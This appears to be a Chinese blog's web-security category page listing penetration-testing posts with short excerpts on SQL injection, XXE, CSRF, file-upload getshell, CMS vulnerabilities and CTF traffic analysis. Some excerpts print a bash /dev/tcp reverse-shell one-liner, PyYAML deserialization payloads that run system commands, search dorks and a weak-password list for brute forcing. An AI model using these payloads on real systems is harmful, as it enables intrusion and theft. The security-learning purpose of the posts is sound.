web安全
文章平均质量分 52
黑面狐
好好活着,因为我们会死很久
展开
-
burpsuite前端JS加密的爆破
使用工具: jsEncrypter burpsuite phantomjs再测试SRC时,弱口令总是比别人搞得慢,特别是遇到前端加密的情况,所以抽时间来完善一下我的武器库。一、jsEncrypter安装今天用到的工具jsEncrypter官方地址https://github.com/c0ny1/jsEncrypter没安装mvn的直接下载 release版本就行了,不用再去编译他。release版本https://github.com/...原创 2021-03-23 20:07:14 · 2635 阅读 · 1 评论 -
微信小程序反编译
准备工具:1.mumu模拟器2.adb 工具3.反编译工具一、获取小程序wxapkg文件。安装mumu模拟器后安装微信。微信打开要反编译的小程序连接。点击打开后,微信会自动下载这个小程序。adb命令连接mumu模拟器mac命令adb kill-server && adb server && adb shellwindows命令adb connect 127.0.0.1:7555adb shell连接后其实就是..原创 2021-03-20 15:26:22 · 1073 阅读 · 1 评论 -
常用的搜索引擎语法
搜索关键字的返回的结果比较的时候这时候使用高级语法和通配符效果会比较容易找到我们想要的页面常用高级语法:intitle 包含标题intext 包含内容filetype 文件类型info 基本信息site 指定网站inurl 包含某个urllink 包含指定链接的网页cache 显示页面的缓存版本numberange ...原创 2020-05-07 09:55:48 · 2184 阅读 · 0 评论 -
php sprintf函数引起的sql注入
sprintf函数作用:sprintf() 函数把格式化的字符串写入变量中。arg1、arg2、++ 参数将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。注释:如果 % 符号多于 arg 参数,则您必须使用占位符。占位符位于 % 符号之后,由数字和 "\$" 组成测试1.php文件...原创 2020-03-11 18:31:15 · 3022 阅读 · 0 评论 -
IIS日志分析练习
找到一个被挂六合彩的站点取日志进行分析。分析过程:用D盾扫描整个站点的存在的可疑文件,然后再日志中对可疑文件进行回溯。kindeditor文件目录下的后门第一次被访问到是 202.131.82.144 ,最终这个IP发现之前的操作时在get请求其他后门文件,http响应码均为404 只有/kindeditor/attached/file/20141225/comnus.asp响应为200,...原创 2018-04-24 11:14:34 · 422 阅读 · 0 评论 -
任意用户密码重置的原因和测试方法
1、验证码不失效。造成的原因:找回密码的时候获取的验证码缺少时间限制仅值判断了验证码是否正确未判断验证码是否过期测试方法:通过美剧找到真正的验证码输入验证码完成验证2、验证码直接返回造成原因:输入手机号后点击获取验证码,验证码在客户端生成,并直接返回在response以方便对接下来的验证码进行比对测试方法:直接输入目标手机号,点击获取验证码,并观察返回包即可。在返回包中得到目标手机号获取的验证码,...原创 2018-05-14 19:09:55 · 1146 阅读 · 0 评论 -
CWE通用缺陷对照表
CWE通用缺陷对照表记录CWE-1 : LocationCWE-113 : Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')CWE-116 : Improper Encoding or Escaping of OutputCWE-118 : Improper Access...原创 2018-06-20 14:17:21 · 4211 阅读 · 0 评论 -
越权访问漏洞总结
一、平行越权攻击者请求操作(增删改查)某条数据时,web应用程序没有判断该条数据的所属人,或者在判断数据所属人时直接从用户提交的表单参数中获取,例如用户id等,导致攻击者可以自行修改参数,操作获取不属于自己的数据。测试方法:在发送请求时观察请求参数,尝试修改用户id或者其他参数验证是否能查看不属于自己的数据,进行增删改查,若成功则存在平行越权的漏洞。 二、纵向越权和平行越权相似...原创 2018-07-28 09:56:39 · 11900 阅读 · 2 评论 -
账号安全测试总结
总结一下会出现账号安全的地方。一、账号密码直接暴露在互联网上1、关注是否把账号信息上传到github上,如数据库信息、邮件配置信息、SVN、数据库备份信息等。二、无限制登录任意账号1、不设置最多登录错误次数,可以暴力破解的2、没有验证码的3、登录存在sql注入,可以使用万能密码的三、电子邮件账号泄露事件1、社工库里查询到的账号密码能成功登录的2、搜索引擎能搜到的...原创 2018-08-12 22:27:36 · 1110 阅读 · 0 评论 -
记录一次恶意软件排查
一、前言前些天有监测出服务器里有一台虚拟机正在扫描445端口。很多蠕虫病毒都是通过445端口传播的,2017年的永恒之蓝也是通过445传播的,所以感觉事情会比较严重。二、前期处理因为那台虚拟机上面没有什么用来监测扫描的软件,初步怀疑可能是虚拟机被人黑了。此时用远程桌面连接上去千万别把磁盘挂载上去,免得有些病毒会直接传到本机去。我用的是vmware连接上去。第一步:断网在网络设置中把网卡禁用掉。防止...原创 2018-02-08 16:16:30 · 810 阅读 · 0 评论 -
RTSP协议详解(转载)
流媒体传输协议介绍一、RTSP协议介绍什么是rtsp?RTSP协议以客户服务器方式工作,,如:暂停/继续、后退、前进等。它是一个多媒体播放控制协议,用来使用户在播放从因特网下载的实时数据时能够进行控制, 因此 RTSP 又称为“因特网录像机遥控协议”。 RTSP(Real-Time Stream Protocol)是一种基于文本的应用层协议转载 2018-02-06 09:15:08 · 32066 阅读 · 0 评论 -
fiddler+proxifier修改本地程序响应任意登录
前言这段时间测试一个C/S产品时,需要登录才能使用。于是开始想办法进行绕过登录。一、弯路走了很多弯路进行尝试,因为需要联网进行认证,所以尝试断网情况,修改配置文件,sql注入都提示服务器连接失败。二、抓包这是想到先抓个数据包分析一下请求和响应,然后伪造一个服务器的响应。于是开始尝试抓取数据包,用wireshark抓取的时候因为是https经过SSL加密的看不到data明文。于是原创 2018-01-19 18:47:31 · 8238 阅读 · 1 评论 -
常见的web漏洞思维导图
原创 2018-01-26 13:47:16 · 2394 阅读 · 0 评论 -
渗透测试之CSRF
CSRF是跨站伪造请求,常见攻击手段发送csrf的连接,通过伪造请求从而受害者点击后会利用受害者的身份发起这个请求。例如新增一个账号,修改用户密码等等。CSRF攻击成功有两个必须的条件。1.被伪造身份的目标曾在该浏览器上访问过CSRF站点,且cookies尚未过期。2.目标被引诱在该浏览器上访问了我们放置恶意代码的域名或网站。接下来我们用bwapp演示CSRF。例子一:第一个例子是利用原创 2018-01-08 17:35:45 · 5444 阅读 · 2 评论 -
记一次刷票过程的感想
我很讨厌投票,别人叫我帮忙投票,我都懒得去投,公司的各种投票我一般都是装作看不到。但是今天这个不一样,今天是我们的一个社团要投票,前些天社团的领导送给我一台旧的洗衣机,的确帮了我很大的忙,为了表示感谢,我我去研究了一下怎么帮他在评比中刷票。因为涉及隐私我就不截图了。刚开始投票都是在微信群里发的,我正好电脑挂着微信,用浏览器打开,打开抓包工具,投了一票,抓数据包看了一下。卧槽传了十几个参数,原创 2017-11-20 09:28:25 · 2610 阅读 · 1 评论 -
常见的判断网站cms方法
今天有同事给了个域名让我判断这个是什么cms,判断完后记录一下cms的几种判断方法。1.robots.txt文件robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的。但是大部分的时候我们都能通过robots.txt文件来判断出cms的类型如:从wp路径可以看出这个是WordPress的cms这个就比较明显了直接告诉我们是PageAdmin原创 2018-01-31 16:28:24 · 27214 阅读 · 1 评论 -
XXE payload
一、漏洞原理当xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。二、漏洞测试平时burp 抓包 可以在请求头添加 Content-type:application/xml并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response fuzz即可三、XXE payload网上收集的payload-------------...原创 2018-08-16 15:37:29 · 7705 阅读 · 0 评论 -
CNVD原创漏洞证书总结
之前打算申请个CNVD的原创漏洞证书。经过这一个多月的时间证书下来了,现在简单总结一下。原创漏洞审核和处理流程参考此链接:http://www.cnvd.org.cn/webinfo/show/3933然后我就说说我提交过两个后台的文件上传漏洞7.26提交-7.27二审通过,验证通过-9.4三审通过,漏洞归档-9.9漏洞公开我在想漏洞公开了,怎么证书也应该下来了,我这个通用型的漏洞...原创 2018-09-12 10:51:41 · 43695 阅读 · 10 评论 -
cms后台利用更新模块压缩包getshell
最近在找文件上传漏洞比较多。现在发现比较难找了,一是文件校验比前几年的更加严格了,黑名单还可以想办法绕过,白名单就相对困难了。最近发现一个getshell的方法,原理是利用文件更新上传带有shell的压缩包。https://github.com/idreamsoft/iCMS/issues/41参考这个漏洞。在更新的时候上传有shell的压缩包,因为没有对压缩包进行校验,所以直接解压成...原创 2018-09-07 09:45:16 · 1006 阅读 · 0 评论 -
web测试中的短信问题
记录一下:网站中手机号已经成为最重要也是最普遍的验证方式了。所以关注短信的问题。1.重置密码/短信验证码登录时验证码回显。直接通过抓包,若验证码直接出现在返回包则直接可以跳过手机验证的阶段。2.验证码没有限制发送频率。利用这个来做短信炸弹,3.发送手机短信验证时不需要输入图片验证码直接发送。直接可以调用接口,可以被人利用做短信轰炸。4.可以控制短信内容。抓包...原创 2019-08-17 23:57:49 · 395 阅读 · 0 评论 -
APP安全测试一般关注点
记录一下:一、身份认证安全1、暴力破解账号密码没有设置错误最大尝试次数,没有验证码校验,2、前端校验账号密码修改返回包的返回值测试。3、密码重置安全利用短信验证码回传,验证码暴力破解等二、业务接口调用1.重放攻击短信炸断,自定义短信内容,邮件查单三、业务交易安全窜依篡改金额,负数支付,绕过支付,支付溢出,多线程并发,多重替换支付四、业务授权安全水平越权和垂直越权...原创 2019-08-11 22:16:03 · 522 阅读 · 0 评论 -
后台getshell常用技巧
1.利用文件上传漏洞,找文件上传处想办法上传php文件。一些网站在设置可以允许修改上传的文件类型则直接添加php有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况这种情况直接上传一个.hatccess文件覆盖这个,让其失效。或者上传不重命名的...原创 2019-04-03 18:02:15 · 12337 阅读 · 1 评论 -
pocsuite3 写poc
知道创宇的pocsuite3更新了。https://github.com/knownsec/pocsuite3一、安装安装p'ython3.4以上pip3 install pocsuite3安装完成后 控制台输入pocsuite,如下结果就是安装成功了二、poc测试写一个很简单的poc测试flask的ssti漏洞from pocsuite3.api im...原创 2019-04-09 14:29:09 · 5588 阅读 · 1 评论 -
python 代码注入、命令执行函数和方法
一.内置危险函数execexecfileeval二.标准库危险模块ossubprocesscommands三.危险第三方库Template(user_input) : 模板注入(SSTI)所产生的代码执行subprocess32四.反序列化marshalPyYAMLpickle和cpickleshelvePILunzip...原创 2019-04-08 13:42:56 · 4107 阅读 · 0 评论 -
pyyaml反序列化漏洞
pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。测试import yamlyaml.load('!!python/object/apply:os.system ["date"]') 结果poc还可以!!python/object/apply:subprocess.check_output [[calc.exe]]!!python/object...原创 2019-02-14 14:05:38 · 871 阅读 · 0 评论 -
几种Linux下反弹shell的方法总结
在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行 nc -lvp port表示显示执行过程监听端口在目标主机上执行 bash -i >& /dev/tcp/ip/port 0>$1这样就可以在我们的主机上执行命令了 二、n...原创 2019-02-14 17:42:20 · 912 阅读 · 0 评论 -
2018弱密码TOP 100
MARK:留着爆破测试 弱口令使用123456password12345678912345678123451111111234567sunshineqwertyiloveyouprincessadminwelcome666666abc123football123123monkey654321!@#$%^&*charlieaa123456do...原创 2018-12-17 13:24:15 · 7011 阅读 · 0 评论 -
insert、update和delete 注入方法
我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和delete的注入方法。以下均为报错注入,测试数据库版本5.7.21利用内置函数updatex...原创 2018-11-28 20:23:53 · 5008 阅读 · 0 评论 -
命令注入
命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。测试脚本command.py:import os,subprocessimport syscommand = "ping -c 4 {}".format(sys.argv[1])p = subprocess.Popen(command, shell=True, stdout=subprocess...原创 2018-12-04 10:34:57 · 4472 阅读 · 1 评论 -
web页面点击劫持
今天看到一个google的点击劫持漏洞获得7500美刀,连接如下https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/ 点击劫持漏洞,利用UI重叠,视觉上的欺骗的漏洞,用于钓鱼。了解点击劫持可以参考freebuff这篇文章《浅析点击劫持攻击》https://www.freebuf.com/ar...原创 2018-11-14 19:55:07 · 1758 阅读 · 0 评论 -
weblogic环境搭建的遇到的问题记录
1.安装时JAVA_HOME路径无效修改文件/home/weblogic/Oracle/Middleware/wlserver_10.3/common/bin/commEnv.sh文件修改JAVA_HOME路径为 JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.9/jre" 2.启动时startWebLogic.sh时又报JAVA_H...原创 2018-10-08 21:39:49 · 982 阅读 · 0 评论 -
记录CTF misc之菜刀流量分析
一、前言昨天参加了一场CTF比赛,做了一道菜刀流量分析的题目,因为之前流量分析这块不是很熟悉,加上实战CTF也比较少走了不少弯路。二、流量分析菜刀是常见的连接webshell的工具,连接webshell会有明显的GET或POST请求。所以我们只需要找数据包的HTTP请求就行了。找到第一个HTTP请求,选择追踪HTTP流,进行分析我们看到webshell就是/upload原创 2018-01-22 09:28:37 · 10072 阅读 · 1 评论 -
渗透测试之POC基于布尔的sql盲注
基于布尔的盲注一般只能告诉我们true or fasle。就比如你只能向系统提问,但是系统只能回答你是或者不是。一般套路是先问数据库名字有多长,1,2,3,4直到回答出是,然后获取到数据库名字长度,然后数据库第一个字符是不是a,b,c,d....直到回答是,获取第一个字符,然后按照这个套路获取到第二个第三个字符最后获取到数据库名称,然后再问表,字段。。还有另一个套路直接字典的,不过这个原创 2018-01-03 15:01:40 · 1122 阅读 · 0 评论 -
渗透测试之POC基于时间的sql盲注
这次写写基于时间的sql盲注。当整个页面没有地方显示数据的时候,这时候存在sql注入,我用md5()函数也没有地方响应出来。那么执行什么函数去证明存在注入呢?sleep()函数,页面执行了,sleep()函数后,从发请求到完全响应就有一个固定的延迟时间。下面来看测试网站:无论你ID=多少他都是 you are in .....基于时间盲注最常见的语句就是 If(asci原创 2018-01-03 14:10:33 · 1790 阅读 · 0 评论 -
Discuz!X 前台任意文件删除漏洞复现测试
今天看到一个Discuz!X 前台任意文件删除漏洞。自己本机搭建环境进行测试环境搭建我用的是Discuz 3.4版本的。phpstudy 环境搭建完毕后,注册一个账号。到达个人信息修改页面。拦截数据包,修改birthprovince参数为文件站点存在的文件。。比如我要测试删除这个group.php文件。发送包以后我们还要构造请求去执行删除的文件。原创 2017-09-30 16:20:33 · 4503 阅读 · 3 评论 -
网络安全攻防实验室通关教程-基础篇
网络安全实验室地址传送门:http://hackinglab.cn一、key在哪里?第一题基本是签到题。提示:key就在这里,你能找到它吗?右键打开网页源码,在注释中找到flag 一般告诉我们key就在这里的话,我们一般会查看网页源码,如果没有就抓取数据包查看。 二、再加密一次你就得到key了加密之后的数据为xrlvf23xfqwsxsqf从题目意思知道原创 2017-10-17 19:22:05 · 10455 阅读 · 1 评论 -
Tomcat任意文件上传漏洞CVE-2017-12615复现测试
今天爆出了一个tomcat7的任意文件上传漏洞,看了大牛们的分析后,我自己本地搭建环境复测。漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本我本地下载的是tomcat7.0.56版本测试测试过程:1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false如图:然后启动tom原创 2017-09-20 19:56:59 · 39690 阅读 · 2 评论 -
手动sql注入记录
一、寻找注入点这个是我们的测试环境,在id后加单引号后报sql错误,所以这里是存在sql注入的。根据错误的提示可以看出来使用的是mysql数据库。二、猜测列表的列数猜测列表的列数一般使用order by的方法?id=1 order by 4一般先假设一个数字,比如10,报错则说明表的列数小于10,然后设置为5,用二分法,慢慢尝试直到找到一个报错和不报错连接的原创 2017-09-28 14:17:18 · 2637 阅读 · 0 评论 -
Burp Suite 暴力破解演示
弱口令是安全问题里面最为严重的问题之一。可以进行暴力破解的也是有条件限制的。1.没有验证码,有验证码就不好进行有效的暴力破解。2.没有多次登录失败后,禁止登录的机制3.没有禁止同IP多次尝试登录。等等。所以要找符合这样的要求的站点还是很难的,so我自己写了个丑陋的演示环境。演示环境源码:登录页面login.php暴力破解演示 用户名:原创 2017-09-11 11:06:55 · 3349 阅读 · 0 评论 -
phpcms v9.6.0版本getshell测试
其实这个漏洞是4月初的时候了。今天有空重新记录一下。一、环境搭建:需要 phpcms V9.6.0安装包/ phpstudy安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下然后浏览器访问:http://ip/phpcms进行安装,安装都是傻瓜式的操作,填写好数据库用户名密码就可以了。。phpstudy的mysql数据库root密码默认为root原创 2017-09-09 17:43:54 · 4899 阅读 · 0 评论